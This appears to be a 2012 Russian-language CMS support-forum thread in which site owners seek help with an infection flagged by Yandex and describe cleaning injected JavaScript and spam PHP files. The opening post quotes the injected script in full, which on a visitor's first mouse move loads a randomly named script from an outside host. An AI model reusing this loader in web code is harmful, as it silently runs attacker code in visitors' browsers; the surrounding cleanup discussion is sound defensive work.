Вирус на сайте (нужна помощь)

RockKenny · 5 апреля 2012

Всем привет.

Сайт fixshop.ru.

Сегодня яндекс сообщил, что на сайте вирус, путем долгих ковыряний был найден скрипт


(function() {

var url = 'http://gmov4d.xvseedhxey.homeftp.net/g/';

if (typeof window.xyzflag === 'undefined') {

window.xyzflag = 0;

}

document.onmousemove = function() {

if (window.xyzflag === 0) {

window.xyzflag = 1;

var head = document.getElementsByTagName('head')[0];

var script = document.createElement('script');

script.type = 'text/javascript';

script.onreadystatechange = function () {

if (this.readyState == 'complete') {

window.xyzflag = 2;

}

};

script.onload = function() {

window.xyzflag = 2;

};

script.src = url + Math.random().toString().substring(3) + '.js';

head.appendChild(script);

}

};

})();

Каким образом он попадет в код сайта не понимаю.

Возможно те кто шарит в движке сразу подскажет где капать: (ссылку открывать в GoogleChrome!!!!)

http://fixshop.ru/engine/classes/min/index.php?charset=windows-1251&g=general

Листаем до конца, там зашифрованный код!

Как он туда попадает?

Для сравнение откройте: (ссылку открывать в GoogleChrome!!!!)

http://dle-news.ru/engine/classes/min/index.php?charset=windows-1251&g=general

Все чисто.

celsoft · 5 апреля 2012

В JS скриптах у вас этот код. Как попадает читайте:

http://forum.dle-news.ru/index.php?showtopic=59186

RockKenny · 5 апреля 2012

Простите, но о каких js идет речь, точно не те, что в папке templates?

Как мне их вычислить?

Изменено 5 апреля 2012 пользователем RockKenny

Wanderers · 5 апреля 2012

Простите, но о каких js идет речь, точно не те, что в папке templates?
Как мне их вычислить?

В файлах с расширением js

В папках /templates/*/js/ тоже смотрите.

RockKenny · 5 апреля 2012

в templates все чисто

celsoft · 6 апреля 2012

Простите, но о каких js идет речь, точно не те, что в папке templates?

не только в папке templates, а в любых которые в папке engine/ и вложенных в нее папках.

Также после восстановления всех оригинальных файлов скрипта, нужно очистить кеш скрипта в админпанели на главной.

RockKenny · 6 апреля 2012

спс, я уже подумал, что проще заменить чем чистить

RockKenny · 6 апреля 2012

троян был в одном из файлов в папке engine/classes/js

komnervov · 6 апреля 2012

Я обнаружил этот троян в 196 js файлах движка, большую часть получилось заменить, но около 40 штук, почему-то в оригинале не оказалось.

Метод поиска: зашел по ФТП через командер, прямо на сервере поиском нашел все файлы JS, после чего сделал сравнение папок оригинала движка и папок на сервере, он выдал все файлы с различиями, за исключением 7 штук, все были .js. Далее там есть функция заменить файлы и одной колонки в другой, все что есть в оригинале движка я заменил, остальные выписал и удалил левый текст руками.

Сейчас попробую очистить кеш, а то после перепроверки яндекс не снял санции.

RockKenny · 7 апреля 2012

жду результатов проверки яндекса

sergeylost · 7 апреля 2012

Я обнаружил этот троян в 196 js файлах движка, большую часть получилось заменить, но около 40 штук, почему-то в оригинале не оказалось.
Метод поиска: зашел по ФТП через командер, прямо на сервере поиском нашел все файлы JS, после чего сделал сравнение папок оригинала движка и папок на сервере, он выдал все файлы с различиями, за исключением 7 штук, все были .js. Далее там есть функция заменить файлы и одной колонки в другой, все что есть в оригинале движка я заменил, остальные выписал и удалил левый текст руками.
Сейчас попробую очистить кеш, а то после перепроверки яндекс не снял санции.

Если не трудно то поподробнее, как вы сделали сравнение. Я хоть и пользуюсь командером, но как то не очень подробно разбирался, все больше как менеджером туда сюда лЁтать по компу. Сорри.

У меня на сайте spbtur.ru (версия 7.6 пора обновляться ох пора!) тоже какая то лабуда. И главное серверные товарисчи с вальюхост.ру утверждают что у них все ок. Типа я сам дурак. Я перестал с ними переписываться когда понял что отвечает один человек за всех методом копи-пасте. Я из папки uploads удалил более 9000 (!!!!) левых файлов с расширением пхп и звучащие как драйвер к магнитоыфону.пхп или драйвер к стиральной машинке .пхп

Я откровенно говоря думал что на этом все и кончится. но не тут то было. Идут какие то волны на сайт, волны запросов вот этих несуществующих файлов. И идут вроде как с сервера.

Вообще голова уже не думает. Прочитал ваш текст и подумалось "а вдруг вычислю?"

Кстати говоря Яндекс говорит что сайт безопасен. несколько раз пробовал. Результат один и тот же. Но тем не менее идут запросы просто как из пулемета вот к примеру кусок лог еррор файла:

- /pub/home/.... /uploads/drayver-na-modem-generik-rocswel.php

[sun Apr 8 00:18:16 2012] [error] [client 217.69.134.91] File does not exist: /pub/home/..../uploads/drayver-nr-lazer-jet-1160.php

[sun Apr 8 00:18:19 2012] [error] [client 217.69.134.91] File does not exist: /pub/home/..../uploads/drayvera-dlya-bluetooth-tm-304.php

В папке аплоадс нет уже никаких этих гадких файлов. Стерты вручную.

При этом IP "клиента" судя по записи меняется. Каждые несколько записей. Идет буквально какая то бомбардировка.

Что это? Бот? Откуда он гад шпилит?

WWW.ZEOS.IN · 8 апреля 2012

удалено

Изменено 8 апреля 2012 пользователем WWW.ZEOS.IN

sergeylost · 8 апреля 2012

sergeylost,

Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован.

А ЭТО ЧТО? ... цитирую из моего предыдущего поста.. У меня на сайте spbtur.ru

Уберите предупреждение! Я НИЧЕГО не нарушил!

Спасибо товарищу Зевсу. Замылил мой вопрос. Теперь будут читать про последнее сообщение про "нарушение" а про вопрос НИКТО не вспомнит. Спасибо.

Я обнаружил этот троян в 196 js файлах движка, большую часть получилось заменить, но около 40 штук, почему-то в оригинале не оказалось.
Метод поиска: зашел по ФТП через командер, прямо на сервере поиском нашел все файлы JS, после чего сделал сравнение папок оригинала движка и папок на сервере, он выдал все файлы с различиями, за исключением 7 штук, все были .js. Далее там есть функция заменить файлы и одной колонки в другой, все что есть в оригинале движка я заменил, остальные выписал и удалил левый текст руками.
Сейчас попробую очистить кеш, а то после перепроверки яндекс не снял санции.

Если не трудно то поподробнее, как вы сделали сравнение. Я хоть и пользуюсь командером, но как то не очень подробно разбирался, все больше как менеджером туда сюда лЁтать по компу. Сорри.

У меня на сайте spbtur.ru (болд фонтом специально для товарища Зевса. Он плохо видит. - У мена версия 7.6 пора обновляться ох пора!) тоже какая то лабуда. И главное серверные товарисчи с вальюхост.ру утверждают что у них все ок. Типа я сам дурак. Я перестал с ними переписываться когда понял что отвечает один человек за всех методом копи-пасте. Я из папки uploads удалил более 9000 (!!!!) левых файлов с расширением пхп и звучащие как драйвер к магнитоыфону.пхп или драйвер к стиральной машинке .пхп